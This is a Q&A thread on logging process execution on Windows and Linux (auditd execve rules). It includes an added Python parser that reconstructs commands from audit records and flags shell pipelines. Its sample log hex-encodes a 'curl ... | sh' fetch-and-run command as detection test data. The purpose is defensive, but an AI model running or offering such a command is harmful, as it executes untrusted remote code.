I'm new to the security domain and I want to ask - Does every program leave an 'imprint' in a log of some kind, in a laptop or a PC - of whatever process it ran. If yes, can they be analysed?
2 Answers
Windows systems can log all processes that are started via system policy:
In Windows 2003/XP you get these events by simply enabling the Process Tracking audit policy. In Windows 7/2008+ you need to enable the Audit Process Creation and, optionally, the Audit Process Termination subcategories which you’ll find under Advanced Audit Policy Configuration in group policy objects.
These events are incredibly valuable because they give a comprehensive audit trail of every time any executable on the system is started as a process. You can even determine how long the process ran by linking the process creation event to the process termination event using the Process ID found in both events.
Linux systems can log all processes that are started using auditd:
In /etc/audit/audit.rules we need to ensure that the following exists.
-a exit,always -F arch=b64 -S execve
This will capture any execve system call (on exit) and will log this to the auditd log. A log entry will look similar to below.
type=SYSCALL msg=audit(1318930500.123:3020171): arch=c000003e syscall=59 success=yes exit=0 a0=7fff65179def a1=7fff65179ec0 a2=7fff6517d060 a3=7ff54ee36c00 items=3 ppid=9200 pid=9202 auid=0 uid=1000 gid=100 euid=1000 suid=1000 fsuid=1000 egid=100 sgid=100 fsgid=100 tty=(none) ses=4 comm="xscreensaver-ge" exe="/usr/bin/perl" key=(null)
type=EXECVE msg=audit(1318930500.123:3020171): argc=5 a0="/usr/bin/perl" a1="-w" a2="/usr/bin/xscreensaver-getimage-file" a3="--name" a4="/home/welby/Pictures
If data exists, it can be analyzed :). But these are just methods of enabling the data capture.
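The answer above shows how to capture execve calls but stops at "if data exists, it can be analyzed". As an added example (not part of the original answer), here is a small parser that does that analysis on raw auditd lines: it joins the SYSCALL and EXECVE records of one event by the `audit(timestamp:serial)` id, rebuilds argv, and then runs a simple detection over the result. The sample log is constructed for this example, modelled on the record in the answer; the second event is invented to show an argument auditd hex-encodes because it contains spaces and a pipe.

```python
import re
from collections import defaultdict

# Constructed sample log (not from a real host). The first event mirrors the
# record in the answer above; the second shows an EXECVE argument that auditd
# writes as unquoted hex because it contains whitespace and a pipe.
_HEX_ARG = "curl http://example.com/x | sh".encode().hex().upper()
SAMPLE_LOG = f"""\
type=SYSCALL msg=audit(1318930500.123:3020171): arch=c000003e syscall=59 success=yes exit=0 a0=7fff65179def a1=7fff65179ec0 a2=7fff6517d060 a3=7ff54ee36c00 items=3 ppid=9200 pid=9202 auid=0 uid=1000 gid=100 euid=1000 suid=1000 fsuid=1000 egid=100 sgid=100 fsgid=100 tty=(none) ses=4 comm="xscreensaver-ge" exe="/usr/bin/perl" key=(null)
type=EXECVE msg=audit(1318930500.123:3020171): argc=5 a0="/usr/bin/perl" a1="-w" a2="/usr/bin/xscreensaver-getimage-file" a3="--name" a4="/home/welby/Pictures"
type=SYSCALL msg=audit(1318930600.456:3020200): arch=c000003e syscall=59 success=yes exit=0 a0=1 a1=2 a2=3 a3=4 items=2 ppid=4100 pid=4177 auid=1000 uid=1000 gid=100 euid=1000 suid=1000 fsuid=1000 egid=100 sgid=100 fsgid=100 tty=pts0 ses=5 comm="sh" exe="/bin/dash" key="exec"
type=EXECVE msg=audit(1318930600.456:3020200): argc=3 a0="sh" a1="-c" a2={_HEX_ARG}
"""

# key=value pairs; a value is either a double-quoted string or a run of non-space
FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
# the event id auditd puts on every record of one event: msg=audit(secs.ms:serial)
MSG_RE = re.compile(r'msg=audit\((\d+\.\d+):(\d+)\)')


def parse_record(line):
    """Split one auditd record into a dict of field name -> raw value."""
    return dict(FIELD_RE.findall(line))


def decode_arg(raw):
    """Decode one EXECVE/exe field value.

    auditd quotes plain values; values containing spaces, quotes or control
    characters are emitted unquoted as uppercase hex. Arguments longer than
    the kernel's chunk size are split into aN[0], aN[1], ... and are not
    reassembled here.
    """
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1]
    if raw == "(null)":
        return ""
    try:
        return bytes.fromhex(raw).decode("utf-8", errors="replace")
    except ValueError:
        return raw


def group_events(log_text):
    """Group records by (timestamp, serial) so SYSCALL and EXECVE meet."""
    events = defaultdict(dict)
    for line in log_text.splitlines():
        match = MSG_RE.search(line)
        if not match:
            continue
        rec = parse_record(line)
        key = (float(match.group(1)), int(match.group(2)))
        events[key][rec["type"]] = rec
    return events


def reconstruct_execs(log_text):
    """Return one dict per complete execve event, with argv rebuilt."""
    execs = []
    for (ts, serial), recs in sorted(group_events(log_text).items()):
        sc, ev = recs.get("SYSCALL"), recs.get("EXECVE")
        if sc is None or ev is None:
            continue  # half an event, e.g. the log was rotated between records
        argc = int(ev["argc"])
        argv = [decode_arg(ev.get(f"a{i}", "(null)")) for i in range(argc)]
        execs.append({
            "time": ts,
            "serial": serial,
            "pid": int(sc["pid"]),
            "ppid": int(sc["ppid"]),
            "auid": int(sc["auid"]),   # login uid: survives su/sudo, unlike uid
            "uid": int(sc["uid"]),
            "exe": decode_arg(sc["exe"]),
            "argv": argv,
            "success": sc["success"] == "yes",
        })
    return execs


def find_shell_pipelines(execs):
    """Flag 'sh -c' style executions whose command string contains a pipe.

    A deliberately narrow hunting rule to show the reconstructed argv being
    put to use; real triage would add parent-process and user context.
    """
    shells = {"sh", "bash", "dash", "zsh"}
    hits = []
    for e in execs:
        name = e["argv"][0].rsplit("/", 1)[-1] if e["argv"] else ""
        if name in shells and "-c" in e["argv"] and "|" in e["argv"][-1]:
            hits.append(e)
    return hits


if __name__ == "__main__":
    for e in reconstruct_execs(SAMPLE_LOG):
        print(e["serial"], e["pid"], e["exe"], e["argv"])
    print("suspicious:", [e["serial"] for e in find_shell_pipelines(SAMPLE_LOG and reconstruct_execs(SAMPLE_LOG))])
```

On a real host the input would come from `/var/log/audit/audit.log` (or `ausearch -sc execve --raw`), and the rule in the answer can be tagged with `-k exec` so the `key=` field can be used to select these records before parsing.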
No, not every program is configured to generate logs.
There are "wrappers" for programs that will generate logs for each process that it runs, and these are used for debugging or for malware research.
- I ask for malware research itself. So every computer does not have a centralized log of what is going on within? Bummer... – Prathiba Sep 03 '15 at 22:58
- If you think about it, that log would be massive within hours. There is little value in recording all that data. – schroeder Sep 03 '15 at 23:02
- Please include the context you have in your question. It really helps us to refine our answers. If you are asking about malware research, you need to look at `cuckoo`. – schroeder Sep 03 '15 at 23:03
- Thank you. My line of thought was to look at the various processes and find malware by analysis in a PC. As I said - I'm new. So I wanted to check whether this was possible. Cuckoo needs to be downloaded. Anything built in that could help with the analysis? – Prathiba Sep 03 '15 at 23:10
- Built in where? – schroeder Sep 03 '15 at 23:12
- In the user's computer. – Prathiba Sep 03 '15 at 23:16
- Windows? Linux? Other? Different things are built in to different systems. – schroeder Sep 03 '15 at 23:17
- Oh... Say Windows or Linux... Could you please let me know for those OSes? – Prathiba Sep 03 '15 at 23:24
- @Thiba - I think it might be helpful if you [edit](https://security.stackexchange.com/posts/98493/edit) your question and fill in the details. Describe what type of research you are doing, on what OSs, what's your goal, what research you've done already, etc... – Neil Smithline Sep 04 '15 at 00:57